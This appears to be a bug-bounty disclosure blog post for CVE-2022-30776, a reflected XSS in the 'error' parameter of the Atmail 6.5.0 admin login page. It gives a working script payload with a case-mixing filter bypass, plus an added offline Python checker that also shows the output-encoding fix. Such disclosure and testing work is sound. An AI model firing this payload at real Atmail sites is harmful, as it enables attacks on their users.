CVE-2022-30776

Ronit Bhatt
May 16, 2022


Reflected XSS on sites using Atmail hosting

Discovered by: Ronit Bhatt

Vulnerable Version: Atmail 6.5.0

Vendor Homepage: https://help.atmail.com/hc/en-us/sections/115003283988

Bug Description:

Reflected cross-site scripting (XSS) in sites running the outdated Atmail version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the "error" query parameter of the admin login page (/atmail/index.php/admin/index/). The value of "error" is written back into the response without HTML encoding, so a victim who opens an attacker-crafted link gets the payload executed in the context of the Atmail origin.

Steps To Reproduce:

1. Visit the admin login page of a site using Atmail hosting, at /atmail/index.php/admin/index/.

2. Append the "error" parameter with an XSS payload as shown below and hit enter, i.e. /atmail/index.php/admin/index/?error=1<ScRiPt >alert(%27XSS%27)</ScRiPt> (the mixed-case tag name and the space before ">" are a common trick against naive, case-sensitive "<script>" filters; a plain <script> tag can be tried first).

3. BOOM! The payload is reflected unencoded into the page and the alert fires: reflected XSS confirmed :D
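The following is an added example and is not code from the original post or from Atmail. It builds the test URL from the post's payload and path, classifies a captured response body as vulnerable (payload echoed back raw), encoded (echoed as HTML entities, the expected safe behaviour) or not reflected, and shows the unsafe string concatenation next to the output-encoded form that a fix would use. The base URL mail.example.test, the render_error* functions and the two sample response bodies are assumptions constructed for this example; nothing is sent over the network.

```python
"""Offline checker for the reflected "error" parameter described above.

Added example, not part of the original post or of Atmail's code.
"""
import html
from urllib.parse import urlencode, urljoin

# Payload taken from the post. The mixed-case tag name and the space before
# ">" are a common trick against naive, case-sensitive "<script>" filters.
PAYLOAD = "1<ScRiPt >alert('XSS')</ScRiPt>"
LOGIN_PATH = "/atmail/index.php/admin/index/"


def build_test_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Return the URL to request, with the payload URL-encoded into 'error'."""
    return urljoin(base_url, LOGIN_PATH) + "?" + urlencode({"error": payload})


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a response body echoes the payload.

    'vulnerable'    : the raw payload appears in the body, so a browser will
                      parse it as markup and run the script.
    'encoded'       : only an HTML-escaped form appears (&lt;ScRiPt &gt;...),
                      with or without the quotes escaped; this is the safe
                      behaviour a patched page should show.
    'not_reflected' : neither form appears.
    """
    if payload in body:
        return "vulnerable"
    if (html.escape(payload, quote=True) in body
            or html.escape(payload, quote=False) in body):
        return "encoded"
    return "not_reflected"


# Illustrative rendering functions (assumed, not Atmail's implementation).
def render_error_unsafe(error_param: str) -> str:
    """Vulnerable pattern: user-controlled text concatenated into HTML raw."""
    return '<div class="error">' + error_param + "</div>"


def render_error(error_param: str) -> str:
    """Hardened pattern: entity-encode the value at the point of output."""
    return '<div class="error">' + html.escape(error_param, quote=True) + "</div>"


# Constructed sample responses (not captured from a real Atmail install).
SAMPLE_VULNERABLE = "<html><body>" + render_error_unsafe(PAYLOAD) + "</body></html>"
SAMPLE_PATCHED = "<html><body>" + render_error(PAYLOAD) + "</body></html>"


if __name__ == "__main__":
    print(build_test_url("https://mail.example.test/"))
    print("vulnerable sample:", classify_reflection(SAMPLE_VULNERABLE))
    print("patched sample:   ", classify_reflection(SAMPLE_PATCHED))
```

To use this against a real target you would fetch build_test_url(...) with your HTTP client of choice and pass the response text to classify_reflection; a result of "vulnerable" means the page is reflecting the parameter raw, while "encoded" means output encoding is in place and the alert will not fire. The render_error pair shows the root cause and the fix in one place: the difference between the two is only whether the value is entity-encoded before it reaches the HTML.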

Hope you like the blog and find some XSS along with some $$$$ 😎.

LinkedIn: https://www.linkedin.com/in/ronit-bhatt-653a7115b/

Thank you

Ronit Bhatt
